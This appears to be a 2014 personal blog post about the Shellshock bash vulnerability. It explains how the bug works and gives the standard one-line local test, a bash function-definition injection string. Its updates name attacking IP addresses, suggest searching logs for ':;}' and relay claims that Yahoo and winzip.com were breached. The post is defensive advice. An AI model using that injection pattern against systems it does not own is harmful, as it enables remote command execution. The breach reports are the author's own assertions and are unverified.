Shellshock – update #2: Yahoo and winzip.com hacked

(see updates at the end of this article)

You may have heard already about the newest security issue Shelshock which already claims to be the worst ever computer bug. I partly agree to that statement.

In short: Shellshock is a bug of a program called “bash”, which is installed on non-Windows systems such as Linux and even Mac computers. The bug allows hackers to send commands to a computer without having admin status, letting them install malicious software within systems.

We all can be affected in two ways by Shellshock:

1.) If you run a computer/server (or device) that can be accessed from outside

2.) If you access a website on a server that has already been compromised

Regarding 2.) there are already servers, known for being compromised by malware which has been installed by using the Shelshock bug. Without being too pessimistic, I think it is not unlikely that will see soon such malware that captures sensitive user information on website visitors or access databases with sensitive information. This is possible as the malware, injected by Shelshock has full system access. Let’s hope that admins of those website will update their systems quick and carefully watch their server log-files.

Regarding 1.) If you run a linux computer your own (all Mac users do) or run a webserver with linux you may be affected if the bash version on that machine has not been updated recently.
You can test for the issue by entering the following command:

env x='() { :;}; echo vulnerable' bash -c "echo no problem"

If you see two warning messages and the message “no problem” you are safe. If you see vulnerable you are in trouble if this system is accessible from the internet.
Depending on your linux distribution, you should update your system by “yum update bash” or “apt-get update” followed by “apt-get upgrade” or possibly other package managers you are using.
All current Mac computers are also affected. Yet, there is no update from Apple but updating bash (and sh) is not too complicated. A good explanation can be found here:

apple.stackexchange.com/questions/146849

Thus, securing your own systems is quite easy and you should hurry to do so.

However, what about all the devices, running linux like routers etc. ? “bash” is a quite heavyweight software which is not ideal for small devices. For instance OpenWRT/DD-WRT doesn’t use it. However, some routers and other devices such as streaming clients have bash installed and definitely need to be updated in order to get secured against Shellshock.

From my personal experience, I expect several new vulnerables and attacks for such devices in the near future. So you better should check for updates on all your devices.


UPDATE #1: Several of my webservers are already under attack, mainly from China. The biggest server is 202.38.120.248 which currently searches for insecure servers and executes a script from 195.225.34.101. I would strongly recommend to any webmaster to scan their logfiles for strings like ‘:;}’.


UPDATE #2: Yahoo and winzip.com were not as quick as us. They have been hacked already. If you have a yahoo.com account or are registered at winzip.com I urge you to change your passwords. Don’t wait. You will find more information here: www.futuresouth.us/yahoo_hacked.html.

Don’t trust the evil

Regards,

Marcus